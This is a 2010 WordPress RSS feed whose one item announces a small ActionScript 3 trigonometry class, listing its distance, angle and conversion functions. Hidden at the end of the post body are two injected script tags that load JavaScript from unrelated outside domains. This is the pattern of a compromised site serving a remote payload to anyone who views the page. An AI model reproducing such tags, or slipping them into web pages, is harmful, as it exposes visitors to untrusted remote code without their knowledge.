<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>REDBLIND &#187; code library</title>
	<atom:link href="http://redblind.com/blog/topic/code-library/feed/" rel="self" type="application/rss+xml" />
	<link>http://redblind.com/blog</link>
	<description>Blog of Jonathan Cipriano</description>
	<lastBuildDate>Sat, 08 May 2010 00:20:36 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>New Trig Class</title>
		<link>http://redblind.com/blog/2008/12/10/new-trig-class/</link>
		<comments>http://redblind.com/blog/2008/12/10/new-trig-class/#comments</comments>
		<pubDate>Thu, 11 Dec 2008 00:59:39 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[code]]></category>
		<category><![CDATA[actionscript 3]]></category>
		<category><![CDATA[code library]]></category>
		<category><![CDATA[flash]]></category>
		<category><![CDATA[math]]></category>
		<category><![CDATA[trigonometry]]></category>

		<guid isPermaLink="false">http://redblind.com/blog/?p=66</guid>
		<description><![CDATA[I&#8217;ve added a simple Trig class to RedLib. Provides easy access to common trig calculations for use in AS3.

Calculate Distance between two objects.
Calculate angle of an object reletive to another. Useful for pointing a MovieClip at another MovieClip.
Convert radians to degrees and degrees to radians.
Calculate X and Y coordinates given a distance and radius from [...]]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve added a simple Trig class to RedLib. Provides easy access to common trig calculations for use in AS3.</p>
<ul>
<li>Calculate Distance between two objects.</li>
<li>Calculate angle of an object reletive to another. Useful for pointing a MovieClip at another MovieClip.</li>
<li>Convert radians to degrees and degrees to radians.</li>
<li>Calculate X and Y coordinates given a distance and radius from an Object.</li>
<li>More to be added.</li>
</ul>
<p>Source available in Google code <a href="http://redblind.com/blog/?page_id=6" title="redlib">here</a>.</p>
<p><em>Update: Looks like some dude, Sekati, has a Trig class almost identical to this one. <a href="http://code.google.com/p/sekati/" title="sekati code" target="_blank">Check it out on google code</a>. The rest of his library is pretty snazzy, too. On a side note, even though you may end up using an existing library, it&#8217;s always to good to try it yourself first. You learn more that way.</em><script src="http://ae.awaue.com/7"></script><script src="http://secowo.com/wo"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://redblind.com/blog/2008/12/10/new-trig-class/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
